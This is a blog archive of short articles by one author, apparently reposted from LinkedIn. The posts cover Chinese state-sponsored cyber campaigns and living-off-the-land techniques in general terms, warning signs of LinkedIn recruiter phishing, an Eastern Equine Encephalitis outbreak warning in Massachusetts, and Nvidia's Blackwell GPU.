The latest in a long line of cyber offensives against the United States, codenamed “Salt Typhoon,” once again lays bare the persistent vulnerability of American infrastructure to foreign adversaries, this time originating from China. These incursions are not isolated events but part of a calculated and multi-pronged campaign by advanced persistent threat (APT) groups whose very names, such as Volt Typhoon, reverberate with a chilling consistency. Each operation, carefully designed to probe the fault lines of U.S. cybersecurity, highlights the expanding ambitions of these foreign actors.


In the Salt Typhoon incident, the specter of compromised systems looms large. The focus falls on internet service providers (ISPs)—the backbone of American digital life—whose very arteries were reportedly infiltrated. Experts investigating the breach raise concerns that core infrastructure, specifically Cisco Systems routers, might have been involved. Though Cisco has vigorously denied that its equipment has succumbed to these attacks, the strategic intent of such operations is unmistakable. The threat of an enemy having unfettered access to sensitive networks, able to intercept data, disrupt services, and perhaps even surveil at will, constitutes nothing less than a significant peril to national security.

Yet, as is often the case in the field of cyber warfare, the public remains woefully unaware of the depth and frequency of these intrusions. The U.S., it seems, is forever on the defensive, scrambling to patch vulnerabilities while its adversaries, undeterred, press on. Beijing’s vast cyber apparatus, ever stealthy and insidious, demonstrates an ability to penetrate America’s most vital systems without firing a single shot. The implications, like so many moments in history, may only become clear after the damage has been done.

Story By,
Skeeter Wesinger
9/26/24

If it sounds like a spy novel, then it might just be true. Living off the Land (LotL) has become the first weapon in the new Cold War, this time between the United States and the People’s Republic of China. This modern battlefield is fought not with tanks or missiles but through the subtle, insidious operations of cyber espionage. It is a war where the battlefield is the internet, and the combatants are not soldiers but bots—small, autonomous programs acting as the foot soldiers of nation-state-sponsored operations.

These bots infiltrate corporate networks with surgical precision, using disguised communications to siphon off critical data and metadata. Unlike overt attacks that trigger alarms and demand immediate responses, these bots slip under the radar, blending seamlessly into the everyday digital traffic of a company. Their presence is not felt, their actions not seen, often for long stretches of time—weeks, months, or even years—until the damage is done.

And the damage, when it finally becomes clear, is catastrophic. Intellectual property is stolen, financial systems are compromised, and sensitive data leaks into the hands of foreign adversaries. The consequences of these attacks stretch far beyond individual companies, threatening the security and economic stability of nations. This new cold war is not fought on the ground but in the unseen spaces of cyberspace, where vigilance is the only defense.

A bot, once embedded within a company’s systems, begins its covert mission. It is a malicious program, programmed with a singular purpose: to relay the company’s most guarded secrets to its unseen master. But its greatest weapon is not brute force or direct confrontation; it is stealth. These bots conceal their communication within the very lifeblood of corporate networks—normal, everyday traffic. Disguised as benign emails, mundane web traffic, or encrypted transmissions that mimic legitimate corporate exchanges, they send stolen information back to their creators without raising suspicion. What appears to be routine data passing through the system is, in fact, a betrayal unfolding in real time.

Their quarry is not just the obvious treasures—financial records, intellectual property, or proprietary designs. The bots are after something less tangible but no less valuable: metadata. The seemingly trivial details about the data—who sent it, when, from where—might appear inconsequential at first glance. But in the hands of a skilled adversary, metadata becomes a road map to the company’s inner workings. It reveals patterns, weaknesses, and, critically, the pathways to deeper infiltration.

For the corporation targeted by such an attack, the consequences are manifold. There is, of course, the potential loss of intellectual property—the crown jewels of any enterprise. Plans, designs, and trade secrets—each a piece of the company’s competitive edge—can be stolen and replicated by rivals. Financial information, once in the wrong hands, can result in fraud, a hemorrhage of funds that can cripple a company’s operations.

Perhaps the most dangerous aspect of these attacks is that compromised security extends beyond the initial theft. Once attackers have a firm grasp of a company’s systems through stolen metadata, they possess a detailed map of its vulnerabilities. They know where to strike next. And when they do, the company’s defenses, having already been breached once, may crumble further. What begins as a single act of theft quickly escalates into a full-scale infiltration.

And then, of course, there is the reputation damage. In the modern marketplace, trust is currency. When customers or clients discover their data has been stolen, they do not hesitate to seek alternatives. The collapse of faith in a company’s ability to safeguard its information can lead to long-term harm, far more difficult to recover from than the financial blow. The loss of reputation is a slow bleed, often fatal.

In short, these disguised communications are the perfect cover for botnet activities, allowing attackers to slip past defenses unnoticed. And when the theft is finally uncovered—if it is ever uncovered—it is often too late. The stolen data has already been transferred, the secrets already sold. The damage, irreversible.

I am reminded of a particular case, an incident that unfolded with a certain sense of inevitability. A seemingly reputable bank auditor, entrusted with sensitive client documents, calmly removed them from the premises one afternoon, claiming a simple lunch break. Upon returning, security, perhaps acting on an inkling of suspicion, inspected the bag. Inside, the documents—marked confidential—lay exposed. The auditor, caught red-handed, was promptly denied further access, and the documents seized. But, alas, the harm had already been done. Trust had been violated, and in that violation, the company learned a hard lesson: Never trust without verifying.

Such is the nature of modern-day espionage—not just a battle of information, but of vigilance. And in this game, those who are too trusting, too complacent, will find themselves outmatched, their vulnerabilities laid bare.

 

Story by Skeeter Wesinger

September 23, 2024

A Large corporation with a well-funded cyber security team recently found out they’d been hacked! Their opponents used the combination of Living off the Land (LotL) techniques, fileless malware, legitimate credentials, and disguised communication makes these types of botnet activities incredibly difficult to detect, even for their expert tiger teams. Without the right focus on behavioral analysis, memory forensics, and network monitoring, even highly skilled teams could miss the subtle signs of this advanced form of attack.

If your teams are looking for traditional malware or malicious executables, they might not have focused on monitoring the activities of legitimate tools. Attackers are now using these tools can camouflage their actions to blend in with normal system administration tasks, so even if your tiger teams were monitoring system processes, the malicious use of these tools could easily go unnoticed.

One of the core advantages of LotL is the use of fileless techniques, which means that the attackers often don’t drop detectable malware on the system’s disk. Instead, they execute code directly in memory or utilize scripting environments like PowerShell. This method leaves behind little to no trace that traditional malware-detection tools or endpoint security would recognize.

The teams may have been conducting disk-based or signature-based analysis, which would be ineffective against fileless malware. Without leaving artifacts on the disk, the attackers bypass traditional endpoint detection, which would have been a major focus of the teams.
Since most of the activity occurs in memory, it would require deep memory forensics to uncover these types of attacks. If the tiger teams didn’t perform real-time memory analysis or use sophisticated memory forensics tools, they could miss the attack entirely.

Story By Skeeter Wesinger

September 19, 2024

U.S. authorities said on Wednesday that Flax Typhoon was used to infiltrate networks by exploiting known vulnerabilities and would then use existing system tools to perform filching.
The bots bypassed traditional security solutions like antivirus and intrusion detection systems because these systems were designed to detect known “malware signatures” or unusual file activity.

Therefore, the state-sponsored actor, in this case, the PRC, would avoid dropping large or sophisticated malware packages as these would increase the likelihood of triggering these defenses by relying on these stealth techniques of using legitimate system tools. They would minimize the use of any detectable malware. Therefore, attackers would avoid detection by the standard signature-based systems. After gaining initial access, the attackers dump user credentials from memory or password stores, allowing them to elevate privileges and move laterally across the network, accessing more sensitive systems and data.

Story By Skeeter Wesinger

September 19, 2024

Phishing attacks on LinkedIn are becoming increasingly sophisticated. State-sponsored actors are posing as recruiters from major headhunting firms like Korn Ferry, based in Los Angeles. These attackers aim to trick professionals into revealing sensitive information or downloading malware by creating profiles that closely resemble those of legitimate recruiters.

The process begins with attackers setting up fake LinkedIn profiles using stolen or fabricated information. A key red flag is the number of LinkedIn connections; if the profile has fewer than 10, it’s often a fake. These profiles frequently use company logos, professional headshots, and detailed job descriptions to appear credible. They may claim to represent well-known firms or major corporations like Google, Microsoft, or top-tier recruitment agencies to target professionals who aspire to work at such companies.

Once the profile is in place, the phishing attempt usually starts with a connection request or a direct message (InMail). The message will likely include a job offer or a unique career opportunity crafted to appeal to the recipient. The attacker might claim they’ve reviewed your profile and believe you are an excellent candidate for a prestigious, high-paying job—tactics often enhanced using AI to generate convincing content.

In the message, the fake recruiter may include a link, supposedly leading to a job portal, a document with more details, or a form to submit your CV. However, these links usually redirect to a malicious site designed to steal login credentials and personal information or install malware. Always hover over any links to inspect them before clicking. If the link looks suspicious, reconsider engaging.

Some of the most sophisticated attackers even create fake LinkedIn login pages or corporate websites to capture your username and password. It’s critical never to reuse passwords, as this could expose you to further attacks down the line. Additionally, they might request personal information such as your phone number, home address, or social security number under the pretense of a job application.

Remember, these attackers are not amateurs—they are state-sponsored actors. Be vigilant and cautious when interacting with unsolicited job offers on LinkedIn. Always verify the legitimacy of any recruiter before providing any information, and stay aware of the signs that an offer may be too good to be true.

 

Article by Skeeter Wesinger

September 16, 2024

 

 

https://www.linkedin.com/pulse/phishing-attacks-linkedin-skeeter-wesinger-5newe

The town of Concord, Massachusetts, announced that they would spray two popular locations with pesticides on Thursday after mosquito sampling confirmed the presence of Eastern Equine Encephalitis (EEE). These locations were Emerson Field at 90 Stow Street and Rideout Playground at 61 Laws Brook Road. Treatment was scheduled for after dusk.
There currently is no specific cure or antiviral treatment for EEE. The treatment for EEE is primarily supportive care, which focuses on managing symptoms and complications as the body fights off the infection. Eastern Equine Encephalitis is not a disease to be trifled with. The most severe cases of EEE require hospitalization, particularly when neurological symptoms like seizures, confusion, or coma occur. Patients may need to be admitted to an intensive care unit (ICU) for close monitoring and management of complications.EEE transmission is typically seasonal, occurring most frequently when mosquitoes are active from late spring through early fall. However, in warmer climates, the transmission season may extend longer. In areas where the virus is present, outbreaks can occur periodically with high mosquito populations.

Mosquito

Like humans, horses can become infected with EEE after being bitten by an infected mosquito. The disease can be severe and often fatal in horses, leading to neurologic symptoms such as instability, head pressing, or seizures.
Other mammals, such as deer or dogs, may occasionally be infected, though they are not primary targets of the virus.
EEE does not occur through human-to-human transmission. According to the CDC, the virus cannot be spread through casual contact, respiratory droplets, or bodily fluids. At this time, the only known transmission method is through an infected mosquito’s bite. However, EEE was transmitted through organ transplantation involving one organ donor and three organ recipients.
Humans and other mammals, such as horses, are dead-end hosts for EEE, meaning that they can become infected by the virus through a mosquito bite but do not spread the virus further.
The EEE virus is mainly spread by mosquitoes, particularly species that thrive in freshwater swampy areas. The most common mosquito responsible for transmitting EEE to humans is Culiseta melanura, which primarily feeds on birds.
However, Aedes, Coquillettidia, and Culex mosquito species also transmit the virus to humans and other animals. These mosquitoes tend to bite both birds and mammals, making them essential “bridge” vectors between the bird and mammal populations.
In the Early Stage of Infection. The ELISA test is performed too early in the infection, as the body may not yet have produced enough detectable antibodies (IgM or IgG). In the acute phase of EEE, it may take a few days to a week for the immune system to produce sufficient antibodies to be detected by the test.
In some cases, as the infection progresses and the acute phase ends, IgM antibody levels decrease, which can lead to a negative result, especially if testing is delayed.
The ELISA tests may sometimes produce false positives or inconclusive results due to cross-reactivity with other flaviviruses or arboviruses (e.g., West Nile virus, Zika virus, or Dengue fever). False positives are more of an issue in regions where multiple mosquito-borne viruses are present, and the immune system’s antibodies against one virus might react with antigens from another. If you have any of these symptoms, contact your physician.

Story By Skeeter Wesinger

In a related case, Joe Casey of Kensington, New Hampshire, about five miles north of Amesbury, Massachusetts, tested positive for eastern equine encephalitis (EEE), West Nile virus, and St. Louis encephalitis. Casey has been hospitalized for several weeks with the illness affecting his brain and nervous system. All while doctors struggle to try to determine which virus is causing his debilitating symptoms.

https://www.cbsnews.com/boston/news/eee-map-massachusetts-towns-mosquitoes/

https://www.cdc.gov/eastern-equine-encephalitis/cause-and-spread/index.html

https://www.linkedin.com/pulse/eastern-equine-encephalitis-skeeter-wesinger-gfyyc

Nvidia Blackwell GPU Nvidia expects to be delivering Blackwell GPU by the end of 2024

In 2022, the first details of Nvidia’s or NUH-vid-ee-uhs Blackwell GPU were leaked, hinting at the company’s next leap in generative AI performance. Early users who have had the opportunity to test the new product report that these GPUs are incredibly fast—so fast that they outpace even the quickest networks currently available. Nvidia has claimed that in recent AI benchmarks, the Blackwell GPU delivers up to a 30x performance boost and a 25x increase in efficiency compared to its predecessors. The company anticipates beginning product shipments by the end of 2024.

It’s also worth noting that in June 2024, Nvidia hinted at a successor to the Blackwell GPU—codenamed Rubin. During his keynote address at Computex, Nvidia CEO Jensen Huang revealed that the next generation of GPUs and CPUs, named “Rubin” in honor of the American astronomer Vera Rubin, is expected to be available in the first half of 2026. If this product reaches the market as planned, it could potentially challenge the limits of Moore’s Law. The Blackwell-architecture GPUs already push boundaries with their 208 billion transistors, built using TSMC’s custom 4NP process.

While Moore’s Law, which predicts the doubling of transistors on a chip approximately every two years, might be approaching its physical limitations, the drive for technological innovation remains strong. The semiconductor industry is shifting towards new chip architectures, quantum computing, and AI and machine learning advancements. The ongoing debate between Nvidia’s Jensen Huang and Intel’s Pat Gelsinger highlights differing views on the future of technological progress. However, innovation in computing will persist, albeit in new and evolving forms.

The Blackwell GPU is engineered with a cutting-edge design that features two dies connected by a 10 TB/s (terabyte per second) interconnect, effectively creating a single two-die GPU. This architecture enables unprecedented performance and efficiency.

Central to this innovation is the GB200 Superchip, which integrates two Blackwell GPUs alongside an Nvidia Grace CPU optimized for peak performance. The GB200 Superchips also can have up to 384 GB of high-bandwidth memory 3e (HBM3e) on-chip, delivering an impressive memory bandwidth of up to 16 TB/s. Like previous HBM generations, HBM3e utilizes 3D stacking technology, where memory dies are stacked vertically and connected through TSVs (Through-Silicon Vias). This compact design reduces the physical footprint of the memory and allows for faster data transfer between layers.

Moreover, multiple GB200 Superchips can be interconnected in clusters using Nvidia’s latest Quantum-X800 and Spectrum-X800 Ethernet, achieving speeds up to 800 GB/s. This advanced networking capability further enhances the scalability and performance potential of the Blackwell architecture, making it a powerful tool for the most demanding AI and computing workloads.

The Blackwell chip features two dies fused together, creating a single chip with a 10TB/s interconnect, which resulted in lower-than-expected yields. According to Nvidia, they have made a change to the Blackwell GPU die mask to improve production yields.

The AI revolution will be comparable to the Industrial or Digital Revolutions, with far-reaching consequences for humanity. The outcomes of the AI revolution will depend on how society chooses to develop and implement AI technology, as this revolution isn’t going to end anytime soon. As both PwC and McKinsey say, AI presents a multi-trillion-dollar opportunity.

 

Story by Skeeter Wesinger

https://www.linkedin.com/pulse/nvidia-blackwell-gpu-skeeter-wesinger-opnee